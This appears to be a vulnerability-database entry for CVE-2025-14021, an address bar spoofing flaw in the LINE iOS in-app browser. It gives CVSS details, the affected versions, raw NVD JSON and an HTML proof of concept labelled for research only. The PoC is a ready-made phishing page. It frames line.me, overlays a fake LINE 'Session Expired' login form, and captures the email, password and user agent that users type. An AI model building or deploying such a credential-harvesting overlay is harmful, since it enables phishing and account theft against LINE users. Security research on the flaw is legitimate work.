Security Vulnerability Report
CVE-2025-14021 CVSS 4.3 MEDIUM

Published: 2025-12-15 07:15:51
Last Modified: 2025-12-18 02:01:43

Description

The in-app browser in LINE client for iOS versions prior to 14.14 is vulnerable to address bar spoofing, which could allow attackers to execute malicious JavaScript within iframes while displaying trusted URLs, enabling phishing attacks through overlaid malicious content.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:linecorp:line:*:*:*:*:*:iphone_os:*:* - VULNERABLE
LINE client for iOS < 14.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-14021 PoC: Address Bar Spoofing in LINE iOS In-App Browser -->
<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>LINE iOS Address Bar Spoofing PoC</title>
  <style>
    body { margin: 0; padding: 0; font-family: Arial, sans-serif; }
    .spoofed-content { position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); display: flex; justify-content: center; align-items: center; z-index: 1000; }
    .login-form { background: white; padding: 40px; border-radius: 10px; box-shadow: 0 10px 40px rgba(0,0,0,0.3); text-align: center; }
    .login-form h2 { color: #333; margin-bottom: 20px; }
    .login-form input { width: 250px; padding: 12px; margin: 10px 0; border: 1px solid #ddd; border-radius: 5px; font-size: 14px; }
    .login-form button { width: 100%; padding: 12px; background: #00B900; color: white; border: none; border-radius: 5px; font-size: 16px; cursor: pointer; margin-top: 10px; }
    .login-form button:hover { background: #009900; }
    .real-page { position: relative; height: 100vh; background: #f5f5f5; padding: 20px; }
    .hidden { display: none; }
  </style>
</head>
<body>
  <!-- Legitimate looking iframe to spoof address bar -->
  <iframe id="spoofFrame" src="https://www.line.me/" style="width:100%; height:100%; border:none;"></iframe>

  <!-- Overlay malicious content -->
  <div id="maliciousOverlay" class="spoofed-content">
    <div class="login-form">
      <h2>⚠️ Session Expired</h2>
      <p style="color:#666; margin-bottom:15px;">Please verify your identity</p>
      <form id="phishingForm">
        <input type="text" id="email" placeholder="Email or Phone" required>
        <input type="password" id="password" placeholder="Password" required>
        <button type="submit">Sign In</button>
      </form>
      <p style="font-size:12px; color:#999; margin-top:15px;">Secured by LINE</p>
    </div>
  </div>

  <script>
    // Wait for iframe to load, then overlay phishing content
    document.getElementById('spoofFrame').onload = function() {
      setTimeout(() => {
        // Inject malicious content that appears to be part of LINE
        const overlay = document.getElementById('maliciousOverlay');
        overlay.style.display = 'flex';
        // Attempt to hide real URL in address bar context
        // In LINE's in-app browser, this content overlays the iframe
        // while the address bar still shows the iframe's URL
      }, 1500);
    };

    // Capture credentials
    document.getElementById('phishingForm').onsubmit = function(e) {
      e.preventDefault();
      const credentials = {
        email: document.getElementById('email').value,
        password: document.getElementById('password').value,
        timestamp: new Date().toISOString(),
        userAgent: navigator.userAgent
      };
      console.log('Stolen credentials:', credentials);
      alert('Verification failed. Please try again.');
    };
  </script>
</body>
</html>

References

https://hackerone.com/reports/2548498 (Permissions Required, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14021", "sourceIdentifier": "[email protected]", "published": "2025-12-15T07:15:50.850", "lastModified": "2025-12-18T02:01:42.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The in-app browser in LINE client for iOS versions prior to 14.14 is vulnerable to address bar spoofing, which could allow attackers to execute malicious JavaScript within iframes while displaying trusted URLs, enabling phishing attacks through overlaid malicious content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linecorp:line:*:*:*:*:*:iphone_os:*:*", "versionEndExcluding": "14.14.0", "matchCriteriaId": "D9FA9E6A-00E2-46D7-AEBC-9081573DFA81"}]}]}], "references": [{"url": "https://hackerone.com/reports/2548498", "source": "[email protected]", "tags": ["Permissions Required", "Third Party Advisory"]}]}}